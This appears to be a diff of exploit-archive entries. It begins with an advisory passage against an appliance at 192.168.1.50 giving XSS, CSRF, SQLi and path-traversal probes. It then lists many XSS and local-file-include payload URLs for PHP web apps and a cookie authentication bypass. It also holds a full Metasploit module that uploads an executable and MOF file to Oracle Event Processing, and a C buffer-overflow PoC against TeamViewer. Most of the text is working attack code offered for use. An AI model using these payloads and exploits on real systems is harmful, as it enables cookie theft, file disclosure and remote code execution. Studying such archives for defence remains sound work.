https://192.168.1.50/manual/csc?mode=%3C/script%3E%3Ccenter%3E%3Cscript%3Edocument.write%28%22%22%29%3C/script%3E%3Cb%3EUser%20Informations:%3C/b%3E%3Cbr/%3E%3Cscript%3Edocument.write%28document.cookie%29%3C/script%3E%3C/center%3E%3Cpwn
[*] CSRF:
PoC:
admin logout:
https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/login/logout?notice=Deconnection+kmkz+CSRF+PoC"</script>
Url encoded admin deconnexion PoC:
https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Flogin%2Flogout%3Fnotice%3DDeconnection%2Bkmkz%2BCSRF%2BPoC%22%3C%2Fscript%3E
Report deleting:
https://192.168.1.50/network/network?new_domain=<script>document.location="https://192.168.1.50/report/delete_pdf/?id=Alert_Details_fireye-2F_20140502_120000.xml"</script>
Url encoded report deleting Poc:
https://192.168.1.50/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2F192.168.1.50%2Freport%2Fdelete_pdf%2F%3Fid%3DAlert_Details_fireye-2F_20140502_120000.xml%22%3C%2Fscript%3E
[*] SQLi PostGreSQL (Exploitable?):
https://192.168.1.50/event_stream/send_pcap_file?ev_id=9999 OR SELECT 1,2
FROM events /**
output:
Event ID '9999 OR SELECT 1,2 FROM events ' could not be retrieved.
Couldn't find Event with id=9999 OR SELECT 1,2 FROM events
https://192.168.1.50/event_stream/send_pcap_file?ev_id=99999999999 Output:
Event ID '99999999999' could not be retrieved.
PG::Error: ERROR: value "99999999999" is out of range for type
integer : SELECT "events".* FROM "events" WHERE "events"."id" = $1 LIMIT 1
[*] Files & Directory Disclosure:
https://192.168.1.50/malware_analysis/ma_repo : the Input Path field
allow Path & file disclosure ../../../../../../../bin/sh (example)
{*] Others:
1)No SQLi (Json)
https://192.168.1.50/network/network?new_domain[$ne]=blah
Return: {"$ne"=>"blah"} is not a valid host // Exploitable?
2)Source code Info-leak:
https://192.168.1.50/manual/csc?mode=%3C/script%3E
--
kmkz
PGP: B24EAF34

9
platforms/php/webapps/33993.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40203/info
Planet Script is prone to a cross-site scripting vulnerability because the it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Planet Script 1.3 and prior are vulnerable.
http://www.example.com/idomains.php?do=encode&decoded=&ext=[ Xss ]

9
platforms/php/webapps/33994.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40207/info
PonVFTP is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
The following example data is available:
javascript:document.cookie="username=admin";

9
platforms/php/webapps/33997.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40227/info
NPDS Revolution is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
NPDS Revolution 10.02 is vulnerable; prior versions may also be affected.
http://www.example.com/download.php?op=geninfo&did=1%22%3E%3Cimg%20src=x%20onerror=alert%28document.cookie%29%3E

9
platforms/php/webapps/33998.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40230/info
The JComments component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to JComments 2.2 are vulnerable.
<form method="POST" action="http://joomla/administrator/index.php" name="main"> <input type="hidden" name="name" value='ComntrName"><script>alert(document.cookie)</script>'> <input type="hidden" name="email" value="example@example.com"> <input type="hidden" name="comment" value="comment text"> <input type="hidden" name="published" value="1"> <input type="hidden" name="option" value="com_jcomments"> <input type="hidden" name="id" value="1"> <input type="hidden" name="task" value="save"> </form> <script> document.main.submit(); </script>

10
platforms/php/webapps/33999.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/40232/info
Mobile Chat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Mobile Chat 2.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/Mobile/main/chatsmileys.php/>"><script>alert(213771818860)</script>

15
platforms/php/webapps/34003.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/40244/info
Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
The following Percha components are affected:
com_perchaimageattach
com_perchafieldsattach
com_perchadownloadsattach
com_perchagallery
com_perchacategoriestree
http://www.example.com/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00

15
platforms/php/webapps/34004.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/40244/info
Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
The following Percha components are affected:
com_perchaimageattach
com_perchafieldsattach
com_perchadownloadsattach
com_perchagallery
com_perchacategoriestree
http://www.example.com/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00

15
platforms/php/webapps/34005.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/40244/info
Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
The following Percha components are affected:
com_perchaimageattach
com_perchafieldsattach
com_perchadownloadsattach
com_perchagallery
com_perchacategoriestree
http://www.example.com/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00

15
platforms/php/webapps/34006.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/40244/info
Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
The following Percha components are affected:
com_perchaimageattach
com_perchafieldsattach
com_perchadownloadsattach
com_perchagallery
com_perchacategoriestree
http://www.example.com/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00

1289
platforms/php/webapps/34007.txt Executable file
View file

File diff suppressed because it is too large Load diff

15
platforms/php/webapps/34008.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/40244/info
Multiple Percha components for Joomla are prone to multiple local file-include vulnerabilities because they fail to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
The following Percha components are affected:
com_perchaimageattach
com_perchafieldsattach
com_perchadownloadsattach
com_perchagallery
com_perchacategoriestree
http://www.example.com/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00

132
platforms/windows/remote/33989.rb Executable file
View file

@ -0,0 +1,132 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Event Processing FileUploadServlet Arbitrary File Upload',
'Description' => %q{
This module exploits an Arbitrary File Upload vulnerability in Oracle Event Processing
11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be
abused to upload a malicious file onto an arbitrary location due to a directory traversal
flaw, and compromise the server. By default Oracle Event Processing uses a Jetty
Application Server without JSP support, which limits the attack to WbemExec. The current
WbemExec technique only requires arbitrary write to the file system, but at the moment the
module only supports Windows 2003 SP2 or older.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-2424'],
['ZDI', '14-106'],
['BID', '66871'],
['URL', 'http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html']
],
'DefaultOptions' =>
{
'WfsDelay' => 5
},
'Payload' =>
{
'DisableNops' => true,
'Space' => 2048
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
['Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 21 2014'))
register_options(
[
Opt::RPORT(9002),
# By default, uploads are stored in:
# C:\Oracle\Middleware\user_projects\domains\<DOMAIN>\defaultserver\upload\
OptInt.new('DEPTH', [true, 'Traversal depth', 7])
], self.class)
end
def upload(file_name, contents)
post_data = Rex::MIME::Message.new
post_data.add_part(rand_text_alpha(4 + rand(4)), nil, nil, "form-data; name=\"Filename\"")
post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"#{file_name}\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => '/wlevs/visualizer/upload',
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => data
})
res
end
def traversal
"../" * datastore['DEPTH']
end
def exploit
print_status("#{peer} - Generating payload and mof file...")
mof_name = "#{rand_text_alpha(rand(5)+5)}.mof"
exe_name = "#{rand_text_alpha(rand(5)+5)}.exe"
exe_content = generate_payload_exe
mof_content = generate_mof(mof_name, exe_name)
print_status("#{peer} - Uploading the exe payload #{exe_name}...")
exe_traversal = "#{traversal}WINDOWS/system32/#{exe_name}"
res = upload(exe_traversal, exe_content)
unless res && res.code == 200 && res.body.blank?
print_error("#{peer} - Unexpected answer, trying anyway...")
end
register_file_for_cleanup(exe_name)
print_status("#{peer} - Uploading the MOF file #{mof_name}")
mof_traversal = "#{traversal}WINDOWS/system32/wbem/mof/#{mof_name}"
upload(mof_traversal, mof_content)
register_file_for_cleanup("wbem/mof/good/#{mof_name}")
end
def check
res = send_request_cgi({
'uri' => '/ohw/help/state',
'method' => 'GET',
'vars_get' => {
'navSetId' => 'cepvi',
'navId' => '0',
'destination' => ''
}
})
if res && res.code == 200
if res.body.to_s.include?("Oracle Event Processing 11g Release 1 (11.1.1.7.0)")
return Exploit::CheckCode::Detected
elsif res.body.to_s.include?("Oracle Event Processing 12")
return Exploit::CheckCode::Safe
end
end
Exploit::CheckCode::Unknown
end
end

116
platforms/windows/remote/34002.c Executable file
View file

@ -0,0 +1,116 @@
source: http://www.securityfocus.com/bid/40242/info
TeamViewer is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
An attacker can leverage this issue to execute arbitrary code within the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
TeamViewer 5.0.8232 is vulnerable; other versions may be affected.
#include<stdio.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<unistd.h>
#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)
#define POCNAME "[*]TeamViewer 5.0.8232 remote BOF poc(0day)"
#define AUTHOR "[*]fl0 fl0w"
typedef int i32;
typedef char i8;
typedef short i16;
enum {
True=1,
False=0,
Error=-1
};
struct linger ling = {1,1};
i8* host;
i16 port;
i32 ver1,ver2,slen;
void syntax(){
i8 *help[]={"\t-h hostname",
"\t-p port(default 5938)",
};
i32 i;
size_t com=sizeof help / sizeof help[0];
for(i=0;i<com;i++){
printf("%s\n",help[i]);
}
}
i32 arguments(i32 argc,i8** argv){
i32 i;
argc--;
for(i=1;i<argc;i++){
switch(argv[i][1]){
case'h':
host=argv[++i];
break;
case'p':
port=atoi(argv[++i]);
break;
default:{
printf("error with argument nr %d:(%s)\n",i,argv[i]);
return Error;
exit(0);
}
}
}
}
i32 main(i32 argc,i8** argv){
if(argc<2){
printf("%s\n%s\n",POCNAME,AUTHOR);
printf("\tToo few arguments\n syntax is:\n");
syntax();
exit(0);
}
arguments(argc,argv);
i32 sok,i,
svcon,
sokaddr;
i8 *sendbytes=ALOC(i8,32768),
*recevbytes=ALOC(i8,5548);
printf("[*]Starting \n \t...\n");
struct sockaddr_in sockaddr_sok;
sokaddr = sizeof(sockaddr_sok);
sockaddr_sok.sin_family = AF_INET;
sockaddr_sok.sin_addr.s_addr = inet_addr(host);
sockaddr_sok.sin_port = htons(port);
sok=socket(AF_INET,SOCK_STREAM,0);
if(sok==-1){
printf("[*]FAILED SOCKET\n");
exit(0);
}
if(svcon=connect(sok,(struct sockaddr*)&sockaddr_sok,sokaddr)<0){
printf("Error with connection\n");
shutdown(sok,1);
exit(0);
}
if(setsockopt(sok, SOL_SOCKET, SO_LINGER, (i8*)&ling, sizeof(ling))<0){
printf("Error setting the socket\n");
shutdown(sok,1);
exit(0);
}
if(recv(sok,&ver1,1,0)!=1)
exit(0);
if(recv(sok, &ver2,1,0)!=1)
exit(0);
memset(sendbytes,0,250);
recv(sok,recevbytes,sizeof(recevbytes),0);
for(i=0;;i++) {
if(!(i & 15)) printf("%d\r", i);
sendbytes[0] = ver1;
sendbytes[1] = ver2;
sendbytes[2] = (i & 1) ? 15 : 21;
*(i16 *)(sendbytes + 3) = slen;
if(send(sok, sendbytes, 5, 0) != 5) break;
if(slen) {
memset(sendbytes, i, slen);
if(send(sok, sendbytes, slen, 0) != slen) break;
}
}
shutdown(sok,1);
return 0;
}